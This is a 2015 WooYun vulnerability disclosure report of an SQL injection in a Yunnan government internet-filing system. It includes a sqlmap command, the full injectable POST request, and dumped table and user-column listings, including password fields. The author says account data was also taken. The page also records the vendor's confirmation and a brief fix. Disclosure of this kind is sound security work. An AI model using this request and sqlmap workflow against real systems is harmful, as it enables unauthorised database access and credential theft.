当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138036

漏洞标题:云南省某敏感部门联网信息备案管理系统存在SQL注入漏洞

相关厂商:云南省某敏感部门

漏洞作者: qglfnt

提交时间:2015-08-31 15:22

修复时间:2015-10-16 10:20

公开时间:2015-10-16 10:20

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

RT

详细说明:

注入数据包 sqlmap -r 1.txt

POST http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:81/UserRecordOperation/PulSearch.aspx
Cookie: ASP.NET_SessionId=3jk31ejwwvxk2c55oeb0xj55; maincardsel=0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 586
__VIEWSTATE=UFvzF7SURJEcPhmKLbVYq12nf5Nwq15iwCSdfL%2BorhcFId4bgKiCAdmY5tzZ01x83NJ2N%2FkxOiF3xmi0MvccJt60VNZL%2FGHQdHkvEQxD0F6KGMVQt1N7sxZNXgJ79EIP8tfDRFEfSLC4bv%2B%2B369oxuno8DLdYWvPY2R7wtKrO7VWjIRkxselw1ue8XkXvDv5Zce8CG8SFiWuiRFmtjt%2FrIDOxvE%3D&__VIEWSTATEGENERATOR=EE853DC6&__EVENTVALIDATION=%2FY0vgI0xv5pZIhOrNkgfc%2BzmAJqouM7Eif7o6BSPRosB%2BjtqYtY%2FAV%2BQA4pIzY7ulQ6jAWaMyh0l6VWNPgXmLlah%2FVZdx6BJONxI4v78ix0Y1POY7eevvQ0n4X0%3D&Radio=2&ctl00%24ContentPlaceHolder1%24TextBox1=1111111111&ctl00%24ContentPlaceHolder1%24ImageButton1.x=62&ctl00%24ContentPlaceHolder1%24ImageButton1.y=1

漏洞证明:

存在问题参数以及当前数据库

20150830211241.png


所有库

20150830211427.jpg



Database: PP_RecordCase
[74 tables]
+---------------------------------+
| Base_ICP_Info |
| Base_IDC_Info |
| Base_ISP_Info |
| Base_Net_Info |
| Base_Place_Info |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| RecordCase_DialupAccount |
| RecordCase_ERoom_Info |
| RecordCase_FixIP_Info |
| RecordCase_Green_Info |
| RecordCase_HardSafeProduct_Info |
| RecordCase_ICP_Info |
| RecordCase_ICP_ServerType |
| RecordCase_ICP_ServiceContent |
| RecordCase_IDC_Info |
| RecordCase_IPAddress |
| RecordCase_ISP_Info |
| RecordCase_IS_Info |
| RecordCase_ManaAuditNotes |
| RecordCase_NetCompany_Info |
| RecordCase_Other_Info |
| RecordCase_PlaceType |
| RecordCase_RecDatu |
| RecordCase_Result_Info |
| RecordCase_SafePersonal_Info |
| RecordCase_ServerAddress |
| RecordCase_ServiceIP |
| RecordCase_SoftSafeProduct_Info |
| RecordCase_SpecificMeasures |
| RecordCase_UpFileType |
| RecordCase_UpLoadExcel_Info |
| RecordCase_UpdateModule |
| RecordCase_UserNotes |
| RecordCase_Wireless_Info |
| SYS_AreaTown_Info |
| SYS_AuditLog_Info |
| SYS_DepartmentDecod_Info |
| SYS_Logs_Info |
| SYS_Option_Info |
| SYS_PerCat_Info |
| SYS_RolePer_Info |
| SYS_Roles_Info |
| SYS_SysTree |
| SYS_UserPer_Info |
| SYS_User_Info |
| VIEW_AuditResult |
| VIEW_EmphasesNetCom_EXPORT |
| VIEW_ICPInfo_Select |
| VIEW_ICP_EXPORT |
| VIEW_ICP_RESULT |
| VIEW_ICP_StandardEXPORT |
| VIEW_ICP_Standard_IDCEXPORT |
| VIEW_IDCInfo_Select |
| VIEW_IDC_EXPORT |
| VIEW_IDC_RESULT |
| VIEW_IDC_StandardEXPORT |
| VIEW_ISPInfo_Select |
| VIEW_ISP_EXPORT |
| VIEW_ISP_RESULT |
| VIEW_ISP_StandardEXPORT |
| VIEW_InternetNetCom_EXPORT |
| VIEW_NETCOMP_RESULT |
| VIEW_NetComInfo_Select |
| VIEW_NetCom_EXPORT |
| VIEW_RolePerCat |
| VIEW_TreePer |
| VIEW_UserRole |
| comd_list |
| dtproperties |
| pangolin_test_table |
| syscommand |
| t_t |
+---------------------------------+


字段

Database: PP_RecordCase
Table: SYS_User_Info
[14 columns]
+---------------+---------+
| Column | Type |
+---------------+---------+
| AreaCodeID | varchar |
| ChangeRecord | int |
| ControlRecord | varchar |
| DeleteRecord | int |
| Email | varchar |
| ID | int |
| Password | varchar |
| Phone | varchar |
| Remark | varchar |
| RoleID | int |
| Sex | varchar |
| SuperiorID | int |
| TrueName | varchar |
| UserName | varchar |
+---------------+---------+


帐号信息,还有很多,只截了一部分

20150830211750.png


拒查水表啊

修复方案:

过滤参数或上WAF

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-09-01 10:19

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无


漏洞评价:

评论